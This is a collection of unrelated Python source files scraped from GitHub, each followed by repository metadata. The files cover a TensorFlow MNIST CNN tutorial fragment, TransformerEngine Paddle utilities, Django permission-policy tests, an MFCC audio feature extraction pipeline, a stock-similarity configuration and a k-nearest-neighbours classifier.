cross_entropy = -tf.reduce_sum(y_*tf.log(y_conv))
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)
correct_prediction = tf.equal(tf.argmax(y_conv,1),tf.argmax(y_,1))
accuarcy = tf.reduce_mean(tf.cast(correct_prediction,"float"))
sess.run(tf.initialize_all_variables())
for i in range(500):
batch = mnist.train.next_batch(50)
if i % 100 == 0:
train_accuracy = accuarcy.eval(feed_dict={x:batch[0],y_:batch[1],keep_prob:1.0})
print("step %d, trainning accuarcy %g"%(i,train_accuracy))
train_step.run(feed_dict={x:batch[0],y_:batch[1],keep_prob:0.5})
print("test accuarcy %g"%accuarcy.eval(feed_dict={
x:mnist.test.images,y_:mnist.test.labels,keep_prob:1.0}))
pdb.set_trace()
| RyanWangZf/Tensorflow_Tutorial | Others/simple_CNN.py | simple_CNN.py | py | 2,840 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "tensorflow.truncated_normal",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "tensorflow.Variable",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "tensorflow.constant",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "t... |
4778562539 | from typing import Optional, Tuple, Union
import paddle
import paddle.nn.functional as F
def cast_if_needed(tensor: Union[paddle.Tensor, None],
dtype: paddle.dtype) -> Union[paddle.Tensor, None]:
"""Cast tensor to dtype"""
return tensor if tensor is None or tensor.dtype == dtype else paddle.cast(tensor, dtype)
def cast_if_needed_inplace(tensor: Union[paddle.Tensor, None],
dtype: paddle.dtype) -> Union[paddle.Tensor, None]:
"""Cast tensor to dtype (inplace), not to be used on layer inputs"""
return tensor if tensor is None or tensor.dtype == dtype else tensor._to(dtype=dtype)
def check_dim_for_fp8_forward_exec(tensor: paddle.Tensor) -> bool:
"""For fp8 fprop (TN layout), inputs and weights must be such
that dim0 is divisible by 8 and dim1 is divisible by 16.
"""
return not tensor.shape[0] % 8 and not tensor.shape[1] % 16
def assert_dim_for_fp8_forward_exec(tensor: paddle.Tensor) -> None:
"""For fp8 fprop (TN layout), inputs and weights must be such
that dim0 is divisible by 8 and dim1 is divisible by 16.
"""
# single tensor check so it's clear which tensor is triggering the assertion
assert check_dim_for_fp8_forward_exec(tensor), (
"Tensor dimensions are not compatible for FP8 execution: "
f"({tensor.shape[0]} % 8 != 0, {tensor.shape[1]} % 16 != 0)")
def get_bias_dtype(activation_dtype: paddle.dtype):
"""Get bias dtype given activation_dtype"""
return paddle.bfloat16 if activation_dtype == paddle.float32 else activation_dtype
def get_paddle_act_func(activation):
"""Get paddle activation function"""
funcs = {
'gelu': F.gelu,
'relu': F.relu,
}
if activation not in funcs:
raise "Activation type " + activation + " is not supported."
return funcs[activation]
def attention_mask_func(attention_scores: paddle.Tensor,
attention_mask: paddle.Tensor) -> paddle.Tensor:
"""Get attention mask"""
def _masked_fill(x, mask, value):
y = paddle.full(x.shape, value, x.dtype)
return paddle.where(mask, y, x)
attention_scores = _masked_fill(attention_scores, attention_mask, -10000.0)
return attention_scores
def mask_to_cu_seqlens(mask: paddle.Tensor, need_kv: bool = False) -> paddle.Tensor:
"""Convert mask to cu_seqlens"""
assert 'bool' in str(mask.dtype), "mask must be bool dtype"
assert len(mask.shape) == 4 and mask.shape[1] == 1, "mask must be [b, 1, s_q, s_kv]"
q_actual_seqlens = paddle.sum(mask[:, :, :, 0] == False, axis=(-1, -2), dtype='int32') # pylint: disable=singleton-comparison
q_cu_seqlens = paddle.cumsum(q_actual_seqlens)
q_cu_seqlens = paddle.concat([paddle.zeros([1], dtype=paddle.int32), q_cu_seqlens], axis=0)
if not need_kv:
return q_cu_seqlens, None
kv_actual_seqlens = paddle.sum(mask[:, :, 0, :] == False, axis=(-1, -2), dtype='int32') # pylint: disable=singleton-comparison
kv_cu_seqlens = paddle.cumsum(kv_actual_seqlens)
kv_cu_seqlens = paddle.concat([paddle.zeros([1], dtype=paddle.int32), kv_cu_seqlens], axis=0)
return q_cu_seqlens, kv_cu_seqlens
def divide(numerator: int, denominator: int) -> int:
"""Ensure that numerator is divisible by the denominator and return
the division value."""
assert (numerator % denominator == 0), f"{numerator} is not divisible by {denominator}"
return numerator // denominator
def save_for_backward_allow_none(ctx, *args) -> None:
"""Save tensors for backward. Args could be None"""
indices_mapping = []
tensors_to_save = []
for x in args:
if isinstance(x, paddle.Tensor):
indices_mapping.append(len(tensors_to_save))
tensors_to_save.append(x)
elif x is None:
indices_mapping.append(-1)
else:
raise ValueError(f"Type {type(x)} is not allowed.")
ctx._indices_mapping = indices_mapping
ctx.save_for_backward(*tensors_to_save)
def saved_tensor_allow_none(ctx) -> Tuple[Optional[paddle.Tensor]]:
"""Used with `save_for_backward_allow_none` in pair. Get saved tensors from ctx."""
assert hasattr(ctx, '_indices_mapping'), "`saved_tensor_allow_none` must be used " \
"with `save_for_backward_allow_none` in pair."
indices_mapping = ctx._indices_mapping
outputs = []
saved_tensors = ctx.saved_tensor()
for index in indices_mapping:
if index < 0:
outputs.append(None)
else:
outputs.append(saved_tensors[index])
return tuple(outputs)
| NVIDIA/TransformerEngine | transformer_engine/paddle/utils.py | utils.py | py | 4,609 | python | en | code | 1,056 | github-code | 36 | [
{
"api_name": "typing.Union",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "paddle.Tensor",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "paddle.dtype",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "paddle.cast",
"lin... |
73060543145 | from tutelary.models import (
PermissionSet, Policy, PolicyInstance
)
from django.contrib.auth.models import User
import pytest
from .factories import UserFactory, PolicyFactory
from .datadir import datadir # noqa
from .settings import DEBUG
@pytest.fixture(scope="function") # noqa
def setup(datadir, db):
user1 = UserFactory.create(username='user1')
user2 = UserFactory.create(username='user2')
user3 = UserFactory.create(username='user3')
PolicyFactory.set_directory(str(datadir))
def_pol = PolicyFactory.create(name='def', file='default-policy.json')
org_pol = PolicyFactory.create(name='org', file='org-policy.json')
prj_pol = PolicyFactory.create(name='prj', file='project-policy.json')
user1.assign_policies(def_pol)
user2.assign_policies(def_pol,
(org_pol, {'organisation': 'Cadasta'}))
user3.assign_policies(def_pol,
(org_pol, {'organisation': 'Cadasta'}),
(prj_pol, {'organisation': 'Cadasta',
'project': 'TestProj'}))
return (user1, user2, user3, def_pol, org_pol, prj_pol)
@pytest.fixture(scope="function") # noqa
def debug(db):
def fn(s):
print(s)
psets = PermissionSet.objects.all()
print('PSets:', list(map(
lambda pset: str(pset.pk) + ': ' + repr(pset.tree()),
psets)
))
pis = PolicyInstance.objects.all()
print('PolInsts:', list(map(lambda pi:
str(pi.pk) + ': ' + str(pi.pset.id) + ' ' +
pi.policy.name + ' ' +
str(pi.variables), pis)))
def nofn(s):
pass
if DEBUG:
return fn
else:
return nofn
def check(nuser=None, npol=None, npolin=None, npset=None):
if nuser is not None:
assert User.objects.count() == nuser
if npol is not None:
assert Policy.objects.count() == npol
if npolin is not None:
assert PolicyInstance.objects.count() == npolin
if npset is not None:
assert PermissionSet.objects.count() == npset
@pytest.mark.django_db # noqa
def test_permission_set_creation(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('CREATION')
check(nuser=3, npol=3, npolin=6, npset=3)
@pytest.mark.django_db # noqa
def test_permission_set_change(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user2.assign_policies(def_pol,
(org_pol, {'organisation': 'DummyCorp'}))
debug('AFTER')
check(nuser=3, npol=3, npolin=6, npset=3)
@pytest.mark.django_db # noqa
def test_permission_set_clear_all(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user1.assign_policies()
user2.assign_policies()
user3.assign_policies()
debug('AFTER')
# Remember the empty permission set!
check(nuser=3, npol=3, npolin=0, npset=1)
@pytest.mark.django_db # noqa
def test_permission_set_clear_single(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user1.assign_policies()
debug('AFTER')
# Remember the empty permission set!
check(nuser=3, npol=3, npolin=5, npset=3)
@pytest.mark.django_db # noqa
def test_permission_user_deletion_single(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user3.delete()
debug('AFTER')
# No empty permission set here: the user is gone!
check(nuser=2, npol=3, npolin=3, npset=2)
@pytest.mark.django_db # noqa
def test_permission_user_deletion_all(datadir, setup, debug):
user1, user2, user3, def_pol, org_pol, prj_pol = setup
debug('BEFORE')
user1.delete()
user2.delete()
user3.delete()
debug('AFTER')
# No empty permission set here: the users are gone!
check(nuser=0, npol=3, npolin=0, npset=0)
| Cadasta/django-tutelary | tests/test_integrity.py | test_integrity.py | py | 4,068 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "factories.UserFactory.create",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "factories.UserFactory",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "factories.UserFactory.create",
"line_number": 14,
"usage_type": "call"
},
{
"a... |
40285478633 | # %%
import logging
import os.path
import shutil
import sys
from typing import Optional
import matplotlib.pyplot as plt
import pandas as pd
import pytorch_lightning as pl
import torch
import torch.nn.functional as F
import torchaudio
from icecream import ic
from torch.utils.data import Dataset, DataLoader
import matplotlib.pyplot as plt
from io import StringIO
try:
from hubert.clustering.filter_dataframe import clean_data_parczech
except ModuleNotFoundError:
from filter_dataframe import clean_data_parczech
class ParCzechDataset(Dataset):
def __init__(self, df_path, resample_rate=16000, df_filters=None, sep='\t', sort=True, train_flag=True, iloc=True, *args, **kwargs):
super(ParCzechDataset, self).__init__()
self.df = pd.read_csv(df_path, sep=sep)
self.filter_df(df_filters)
if train_flag:
self.df = self.df[(self.df.type == 'train') | (self.df.type == 'other')]
if sort:
self.df = self.df.sort_values(by=['duration__segments'], ascending=False).copy().reset_index(drop=True)
self.new_sr = resample_rate
self.resample_transform = None
# this configures the __getitem__ method, when self.iloc is true index in __getitem__ is interpreted as integer location in dataframe
# when self.iloc is False index in __getitem__ is interpreted as an element in self.df.index
self.iloc = iloc
def index_df(self, i, column_name=None):
if self.iloc:
row = self.df.iloc[i]
else:
row = self.df.loc[i]
if column_name is not None:
return row[column_name]
return row
def get_mp3_name(self, i):
row = self.index_df(i)
try:
# need to remove prefix 'sentences_'
mp3_name = row.mp3_name.split('_')[-1]
except:
ic(row)
raise ValueError(f'can not find row by index {i}')
return mp3_name
def extract_path(self, i):
row = self.index_df(i)
mp3_name = self.get_mp3_name(i)
return os.path.join(row.segment_path, mp3_name)
def get_gold_transcript(self, path):
with open(f'{path}.prt', 'r') as f:
return f.read().rstrip()
def get_asr_transcript(self, path):
with open(f'{path}.asr', 'r') as f:
return f.read().rstrip()
def _safe_read_df(self, path, names, header, sep, dtypes, na_values):
if not os.path.isfile(path):
print(f'{path} does not exist')
replace_dict = {
'"': "__double_quotes__",
}
with open(path, 'r') as f:
src = ''.join(f.readlines())
for k, v in replace_dict.items():
src = src.replace(k, v)
df = pd.read_csv(StringIO(src), names=names, header=header, sep=sep, dtype=dtypes, na_values=na_values)
return df
def get_recognized_df(self, path, i):
# will extract recognized based on word ids
header = ['word', 'word_id', 'start_time', 'end_time', 'XXX', 'avg_char_duration', 'speaker']
try:
words_df = self._safe_read_df(
f'{path}.words',
names=header,
header=None,
sep='\t',
# replace_col=['word'],
dtypes=None,
na_values=None,
)
except Exception as e:
ic(path)
ic(e)
raise ValueError(f'Can not read file {path}')
word_ids = words_df['word_id'].values.tolist()
# read aligned file
path_aligned = f"/lnet/express/work/people/stankov/alignment/results/full/words-aligned/jan/words_{self.get_mp3_name(i)}.tsv"
# normalization is done by the length of the "true_word"
header_aligned = ['true_w', 'trans_w', 'joined', 'id', 'recognized', 'dist', 'dist_norm', 'start', 'end', 'time_len_ms', 'time_len_norm']
dtypes = dict(
true_w=str,
trans_w=str,
joined=bool,
id=str,
recognized=bool
)
for name in header_aligned:
if name not in dtypes:
dtypes[name] = float
aligned_df = self._safe_read_df(
path_aligned,
header_aligned,
sep='\t',
dtypes=dtypes,
na_values='-',
header=0
)
aligned_df.trans_w = aligned_df.trans_w.fillna('-')
aligned_df = aligned_df[aligned_df['id'].isin(word_ids)]
return aligned_df
def get_recognized_transcript(self, path, i):
aligned_df = self.get_recognized_df(path, i)
# from miliseconds to seconds
start_time = aligned_df['start'].min() / 1000
end_time = aligned_df['end'].max() / 1000
mp3_name = self.get_mp3_name(i)
path_transcribed = f'/lnet/express/work/people/stankov/alignment/results/full/scrapping/jan/{mp3_name}/{mp3_name}.tsv'
if not os.path.isfile(path_transcribed):
# print(f'{mp3_name} is not in scraping')
path_transcribed = f'/lnet/express/work/people/stankov/alignment/results/full/time-extracted/jan/{mp3_name}.tsv'
header_transcribed = ['start', 'end', 'recognized', 'true_word', 'cnt', 'dist']
transcribed_df = pd.read_csv(path_transcribed, names=header_transcribed, header=None, sep='\t')
# ic(start_time, end_time, transcribed_df.head())
transcript = transcribed_df[(transcribed_df.start >= start_time) & (transcribed_df.end <= end_time)].recognized.values.tolist()
return ' '.join(transcript)
def resample(self, sr, wav):
if self.resample_transform is None:
self.resample_transform = torchaudio.transforms.Resample(orig_freq=sr, new_freq=self.new_sr)
return self.resample_transform(wav)
def get_wav(self, path):
wav, sr = torchaudio.load(f'{path}.wav', normalize=True)
# stereo to mono if needed
if wav.size(0) == 2:
wav = torch.mean(wav, dim=0).unsqueeze(0)
return self.resample(sr, wav)
def duration_hours(self, filters=None):
if filters is not None:
df = clean_data_parczech(self.df, filters)
else:
df = self.df
return df.duration__segments.sum() / 3600
def plot_stat(self, col_name, filters=None):
if filters is not None:
df = clean_data_parczech(self.df, filters)
else:
df = self.df
# plt.boxplot(dataset.df.avg_char_duration__segments, vert=False)
print(df.sort_values(by=[col_name])[col_name])
plt.plot(range(len(df)), df.sort_values(by=[col_name])[col_name])
plt.title(f'{col_name} sorted, {self.duration_hours(filters):.2f}h')
plt.xlabel('segments')
plt.ylabel(col_name)
plt.show()
def filter_df(self, filters, reset_index=False):
if filters is None:
return
self.df = clean_data_parczech(self.df, filters)
if reset_index:
self.df.reset_index(drop=True, inplace=True)
def get_columns(self):
return self.df.columns.values
def __getitem__(self, i):
path = self.extract_path(i)
return dict(
gold_transcript=self.get_gold_transcript(path),
asr_transcript=self.get_asr_transcript(path),
wav=self.get_wav(path),
path=os.path.dirname(path)
)
def __len__(self):
return len(self.df)
def clean_data(df, params):
# thresholds were selected based on the plot
df = df[(df.type == 'train') | (df.type == 'other')]
df = df[df.recognized_sound_coverage__segments > params['recognized_sound_coverage__segments_lb']]
df = df[df.recognized_sound_coverage__segments < params['recognized_sound_coverage__segments_ub']]
# removed 404.5 hours
# use only long enough segments
ic(df.duration__segments.sum() / 3600)
if 'duration__segments_lb' in params:
df = df[df.duration__segments > params['duration__segments_lb']]
if 'duration__segments_ub' in params:
df = df[df.duration__segments < params['duration__segments_ub']]
ic(df.duration__segments.sum() / 3600)
return df
class CommonVoiceDataset(Dataset):
def __init__(self, base_dir, type, resample_rate=16000):
self.data_path = os.path.join(base_dir, 'clips')
self.df = pd.read_csv(os.path.join(base_dir, f'{type}.tsv'), sep='\t')
self.resample_rate = resample_rate
self.resample_transform = None
def resample(self, waveform, sr):
if self.resample_transform is None:
self.resample_transform = torchaudio.transforms.Resample(sr, self.resample_rate)
return self.resample_transform(waveform)
def __getitem__(self, i):
if torch.is_tensor(i):
i = i.item()
waveform, sample_rate = torchaudio.load(os.path.join(self.data_path, self.df.path[i]))
return dict(
wav=self.resample(waveform, sample_rate),
path=self.df.path[i]
)
def __len__(self):
return len(self.df)
class MFCCExtractorPL(pl.LightningModule):
def __init__(self, n_mffcs, n_mels, f_max, resample_rate, output_dir, n_fft=400):
super(MFCCExtractorPL, self).__init__()
self.output_dir = output_dir
self.n_fft = n_fft
self.sr = resample_rate
self.MFCC_transform = torchaudio.transforms.MFCC(
resample_rate,
n_mfcc=n_mffcs,
melkwargs=dict(
n_mels=n_mels,
n_fft=n_fft, # default
hop_length=n_fft // 2, # default
f_max=f_max,
)
)
self.delta_transform = torchaudio.transforms.ComputeDeltas()
def prepare_data(self):
if os.path.exists(self.output_dir):
shutil.rmtree(self.output_dir)
os.makedirs(self.output_dir)
def forward(self, batch):
wavs, _, lens = batch
mfccs_batch = self.MFCC_transform(wavs)
deltas_batch = self.delta_transform(mfccs_batch)
deltas2_batch = self.delta_transform(deltas_batch)
# all shapes [batch_size, 1, 13, max_n_frames]
# stacking features
output = torch.cat([mfccs_batch, deltas_batch, deltas2_batch], dim=2).squeeze().permute(0, 2, 1)
# [batch_size, max_n_frames, 13 * 3]
n_frames = torch.tensor([compute_frames(l, self.sr) for l in lens], device=self.device)
return output, n_frames
def compute_frames(wave_len, sample_rate):
ms_int = int(wave_len / sample_rate * 1000)
# these "random" operations mimic how hubert.feature extractor counts frames in the audio
new_ms = (ms_int - (ms_int % 5) - 1) // 20
return new_ms
class SaveResultsCB(pl.Callback):
def __init__(self, target_path, n_fft, buffer_size, df_type, total_batches, resample_rate=16000, frame_length=20):
self.df_type = df_type
self.output_dir = target_path
self.n_fft = n_fft
# number of frames to store at one csv
self.buffer_size = buffer_size
self.frame_length = frame_length
self.dataframes = []
self.current_buffer = 0
# count how many df written to disk
self.cnt = 0
self.resample_rate = resample_rate
self.total_duration_sec = 0
self.loggers = {}
self.total_batches = total_batches
def extract_name(self, path):
if self.df_type == 'common_voice':
return path
elif self.df_type == 'parczech':
return '/'.join(path.split('/')[-2:])
else:
raise NotImplementedError(f'{self.df_type} is not supported')
def write_df(self, trainer):
output_path = os.path.join(self.output_dir, f'{trainer.global_rank:02}-{self.cnt:04}.csv')
result = pd.concat(self.dataframes).reset_index()
result['path'] = result['path'] + '/' + result['index'].astype(str)
result.drop('index', axis=1).to_csv(output_path, index=False)
self.current_buffer = 0
self.dataframes = []
self.cnt += 1
def on_predict_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx):
_, paths, wave_lens = batch
self.total_duration_sec += sum(w_len / self.resample_rate for w_len in wave_lens)
mfcc_features, frames_cnt = outputs[0].cpu().numpy(), outputs[1].cpu().numpy()
for n_frames, features, path in zip(frames_cnt, mfcc_features, paths):
self.current_buffer += n_frames
# select only useful frames without padding
features = features[:n_frames]
features_df = pd.DataFrame(data=features)
features_df['path'] = self.extract_name(path)
self.dataframes.append(features_df)
if self.current_buffer >= self.buffer_size:
self.write_df(trainer)
if batch_idx % 50 == 0:
logger = self.loggers[pl_module.global_rank]
logger.debug(f'gpu={pl_module.global_rank:2} batches processed {batch_idx:4}/{self.total_batches} ... {batch_idx / self.total_batches:.4f}')
def setup(self, trainer: "pl.Trainer", pl_module: "pl.LightningModule", stage: Optional[str] = None) -> None:
# setup loggers for each gpu
# logging.basicConfig(filename=logging_file, filemode='a', level=logging.DEBUG, format='%(asctime)s - %(message)s', datefmt='%H:%M:%S %d.%m.%Y')
handler = logging.FileHandler(f'gpu-{pl_module.global_rank}.log')
formatter = logging.Formatter(fmt='%(asctime)s - %(message)s', datefmt='%H:%M:%S %d.%m.%Y')
handler.setFormatter(formatter)
logger = logging.getLogger(f'{pl_module.global_rank}')
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
self.loggers[pl_module.global_rank] = logger
def on_predict_epoch_end(self, trainer, pl_module, outputs):
if self.dataframes != []:
self.write_df(trainer)
logger = self.loggers[pl_module.global_rank]
total_duration_hours = int(self.total_duration_sec // 3600)
remaining_seconds = int(self.total_duration_sec % 3600)
total_duration_mins = int(remaining_seconds // 60)
total_duration_secs = int(remaining_seconds % 60)
logger.debug(f'gpu={pl_module.global_rank:2} finished, {total_duration_hours:3}:{total_duration_mins:2}:{total_duration_secs:.3f} or'
f' {self.total_duration_sec:.3f} seconds')
def collate_fn(batch):
M = max([x['wav'].size(-1) for x in batch])
wavs = []
paths = []
for x in batch:
padded = F.pad(x['wav'], (0, M - x['wav'].size(-1)))
wavs.append(padded)
paths.append(x['path'])
# save lengths of waveforms, will be used to cut the padding from spectrogram
lengths = [x['wav'].size(-1) for x in batch]
return torch.stack(wavs, dim=0), paths, lengths
def plot_spectrogram(spec, title=None, ylabel='freq_bin', aspect='auto', xmax=None, lim=None):
fig, axs = plt.subplots(1, 1)
axs.set_title(title or 'Spectrogram (db)')
axs.set_ylabel(ylabel)
axs.set_xlabel('frame')
im = axs.imshow(spec, origin='lower', aspect=aspect)
if xmax:
axs.set_xlim((0, xmax))
fig.colorbar(im, ax=axs)
if lim is not None:
plt.axvline(x=lim, color='red')
plt.show(block=False)
# %%
if __name__ == '__main__':
# %%
# logging.basicConfig(filename=logging_file, filemode='a', level=logging.DEBUG, format='%(asctime)s - %(message)s', datefmt='%H:%M:%S %d.%m.%Y')
params = dict(
resample_rate=16000,
batch_size=70,
n_mffcs=13,
n_mels=40,
n_fft=640,
buffer_size=130000,
df_type='parczech',
frame_length_ms=20,
data_type='validated'
)
parczech_clean_params = dict(
recognized_sound_coverage__segments_lb=0.45,
recognized_sound_coverage__segments_ub=0.93,
duration__segments_lb=0.5,
)
if 'lnet' in os.getcwd():
df_path = '/lnet/express/work/people/stankov/alignment/Thesis/clean_with_path_large.csv'
# df = pd.read_csv(df_path, sep='\t')
# directory where mfccs will be stored
output_dir = '/lnet/express/work/people/stankov/alignment/mfcc'
dataset = ParCzechDataset(df_path, resample_rate=params['resample_rate'], clean_params=parczech_clean_params)
else:
# under base dir there are tsv file and clips/ folder
base_dir = '/root/common_voice_data/cv-corpus-7.0-2021-07-21/cs'
# directory where mfccs will be stored
output_dir = os.path.join(base_dir, 'mffcs')
dataset = CommonVoiceDataset(base_dir, params['data_type'], params['resample_rate'])
# %%
dataloader = DataLoader(dataset, batch_size=params['batch_size'], shuffle=False, collate_fn=collate_fn, num_workers=os.cpu_count() // 4, pin_memory=True)
extractor = MFCCExtractorPL(n_mffcs=params['n_mffcs'], n_mels=params['n_mels'], n_fft=params['n_fft'], f_max=params['resample_rate'] // 2,
output_dir=output_dir, resample_rate=params['resample_rate'])
cb = SaveResultsCB(output_dir, params['n_fft'], buffer_size=params['buffer_size'], df_type=params['df_type'], frame_length=params['frame_length_ms'],
total_batches=len(dataloader))
trainer = pl.Trainer(gpus=-1, strategy='ddp', num_sanity_val_steps=0, callbacks=cb, deterministic=True, progress_bar_refresh_rate=0)
# trainer = pl.Trainer(gpus=1, num_sanity_val_steps=0, callbacks=cb, precision=16, deterministic=True, limit_predict_batches=10)
trainer.predict(extractor, dataloader)
ic('done')
| Stanvla/Thesis | hubert/clustering/torch_mffc_extract.py | torch_mffc_extract.py | py | 17,709 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "torch.utils.data.Dataset",
"line_number": 25,
"usage_type": "name"
},
{
"api_name": "pandas.read_csv",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "icecream.ic",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "os.path.path.joi... |
8694387627 | import pandas as pd
import numpy as np
import os
from datetime import timedelta
import math
pd.set_option('display.width', 1200)
pd.set_option('precision', 3)
np.set_printoptions(precision=3)
np.set_printoptions(threshold=np.nan)
class Config:
__instance = None
def __new__(cls, *args, **kwargs):
if cls.__instance is None:
cls.__instance = object.__new__(cls, *args, **kwargs)
return cls.__instance
def __init__(self):
print('Init Config!', os.getpid())
# 文件路径相关参数
self.rootPath = os.path.split(os.path.abspath(os.path.dirname(__file__)))[0]
self.ZZ800_DATA = self.rootPath + '/data/800_data.csv'
self.ZZ800_RAW_DATA = self.rootPath + '/data/800_raw_data.csv'
self.ZZ800_CODES = self.rootPath + '/data/800_codes.csv'
self.ZZ800_RM_VR_FFT = self.rootPath + '/data/800_rm_vr_fft.csv'
self.MARKET_RATIO = self.rootPath + '/data/index_ratio.csv'
self.TRAINING_DAY = self.rootPath + '/data/trading_day.csv'
# self.speed_method = 'value_ratio_fft_euclidean' # for 沪深300指数预测
self.speed_method = 'rm_market_vr_fft' # for 沪深800选股
self.update_start = '2018-05-18' # 更新数据的开始时间(数据库日期的最后一天的下一天)
self.update_end = '2018-05-21' # 更新数据的结束时间(这一天也会被更新下来)
self.auto_update = False # 回测时是否自动更新数据
self.plot_simi_stock = False # 是否画出相似股票
# self.is_regression_test = False # 是回测还是预测
# self.start_date = pd.to_datetime('2018-05-16') #回测的开始时间。 比如'2018-01-01',则从'2018-01-02'开始做预测
# self.regression_days = 5
self.is_regression_test = True
self.start_date = pd.to_datetime('2011-01-01')
self.regression_days = 800
self.regression_end_date = self.start_date + timedelta(days=self.regression_days) # 回测结束时间
# 相似性查找参数
self.pattern_length = 30
self.nb_similar_make_prediction = 20 # avergae them as a pred
self.nb_similar_of_all_similar = 4000 # 从所有股票的相似票中选择top N
self.nb_similar_of_each_stock = 200
self.slide_window = 1500
self.weighted_dist = True
self.weight_a = 1
self.weight_b = 2
self.alpha = np.multiply([1, 1, 1, 1, 1], 40)
self.beata = np.multiply([1, 1, 1, 1, 1], math.pi / 180)
self.fft_level = 5
self.similarity_method = 'euclidean' # or 'pearsonr'
self.cores = 20
self.nb_codes = 800
# 输出文件地址
name = str(self.start_date.date()) + '_' + str(self.speed_method) + '_' + str(self.nb_similar_make_prediction)
self.PEARSON_CORR_RESLUT = self.rootPath + '/output/corr' + name + '.csv'
self.PRDT_AND_ACT_RESULT = self.rootPath + '/output/pred' + name +'.csv'
self.regression_result = self.rootPath + '/pic/para_' + name + '.png'
config = Config()
if __name__ == '__main__':
std_data = pd.read_csv(config.DATA)
| cheersyouran/simi-search | codes/config.py | config.py | py | 3,162 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "pandas.set_option",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pandas.set_option",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "numpy.set_printoptions",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "numpy.set_pri... |
20238646277 | from numpy import *
import operator
import matplotlib
import matplotlib.pyplot as plt
from os import listdir
def classify0(inX, dataSet, labels, k):
dataSetSize=dataSet.shape[0]#返回dataset的第一维的长度
print(dataSetSize)
diffMat = tile(inX, (dataSetSize,1)) - dataSet
#计算出各点离原点的距离
#表示diffMat的平方
sqDiffMat = diffMat**2#平方只针对数组有效
sqDistances=sqDiffMat.sum(axis = 1)
distances=sqDistances**0.5
sortedDistIndices = distances.argsort()#返回从小到大的引索
classCount = {}
for i in range(k):
voteLabel = labels[sortedDistIndices[i]]#找到对应的从小到大的标签
classCount[voteLabel] = classCount.get(voteLabel,0)+1
sortedClassCount = sorted(classCount.items(),key=operator.itemgetter(1),reverse=True)
return sortedClassCount[0][0]
def createDataSet():
group=array([[1.0,1.1],[1.0,1.0],[0,0],[0,0.1]])#numpy里面的数组,注意和list的区别
labels=['A','A','B','B']
return group,labels
def file2matrix(filename):
fr=open(filename)
arrayOLines=fr.readlines()
numberOfLines=len(arrayOLines)
print(numberOfLines)
returnMat=zeros((numberOfLines,3))
classLabelVector=[]
index = 0
for lines in arrayOLines:
lines = lines.strip()
listFromLine = lines.split('\t')
returnMat[index,:]=listFromLine[0:3]
classLabelVector.append(int(listFromLine[-1]))
index += 1
return returnMat,classLabelVector
def show(datingDataMat,datingLabels):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(datingDataMat[:, 1], datingDataMat[:, 2],15.0*array(datingLabels),15.0*array(datingLabels))
plt.show()
def autoNorm(dataSet):#将特征值归一化
minVals=dataSet.min(0)#选择数据集中最小的
maxVals=dataSet.max(0)
ranges = maxVals - minVals
normDataSet=zeros(shape(dataSet))
m = dataSet.shape[0]
normDataSet = dataSet-tile(minVals,(m,1))
normDataSet = normDataSet/tile(ranges,(m,1))
return normDataSet,ranges,minVals
def datingClassTest():
hoRatio = 0.50 # hold out 10%
datingDataMat, datingLabels = file2matrix('datingTestSet2.txt') # load data setfrom file
normMat, ranges, minVals = autoNorm(datingDataMat)
m = normMat.shape[0]
numTestVecs = int(m * hoRatio)
errorCount = 0.0
for i in range(numTestVecs):
classifierResult = classify0(normMat[i, :], normMat[numTestVecs:m, :], datingLabels[numTestVecs:m], 3)
print("the classifier came back with: %d, the real answer is: %d" % (classifierResult, datingLabels[i]))
if (classifierResult != datingLabels[i]):
errorCount += 1.0
print( "the total error rate is: %f" % (errorCount / float(numTestVecs)))
# print(errorCount)
def img2vector(filename):
returnVect = zeros((1, 1024))
print("returnVect\n"+returnVect)
fr = open(filename)
for i in range(32):
lineStr = fr.readline()
for j in range(32):
returnVect[0, 32 * i + j] = int(lineStr[j])
return returnVect
def handwritingClassTest():
hwLabels = []
trainingFileList = listdir('trainingDigits') # load the training set
m = len(trainingFileList)
trainingMat = zeros((m, 1024))
print(trainingMat)
for i in range(m):
fileNameStr = trainingFileList[i]
fileStr = fileNameStr.split('.')[0] # take off .txt
classNumStr = int(fileStr.split('_')[0])
hwLabels.append(classNumStr)
trainingMat[i, :] = img2vector('trainingDigits/%s' % fileNameStr)
testFileList = listdir('testDigits') # iterate through the test set
errorCount = 0.0
mTest = len(testFileList)
for i in range(mTest):
fileNameStr = testFileList[i]
fileStr = fileNameStr.split('.')[0] # take off .txt
classNumStr = int(fileStr.split('_')[0])
vectorUnderTest = img2vector('testDigits/%s' % fileNameStr)
classifierResult = classify0(vectorUnderTest, trainingMat, hwLabels, 3)
print("the classifier came back with: %d, the real answer is: %d" % (classifierResult, classNumStr))
if (classifierResult != classNumStr): errorCount += 1.0
print("\nthe total number of errors is: %d" % errorCount)
print("\nthe total error rate is: %f" % (errorCount / float(mTest)))
if __name__ == "__main__":
group,labels = createDataSet()
classer=classify0([0,0],group,labels,3)
handwritingClassTest()
# datingDataMat, datingLabels=file2matrix('datingTestSet2.txt')
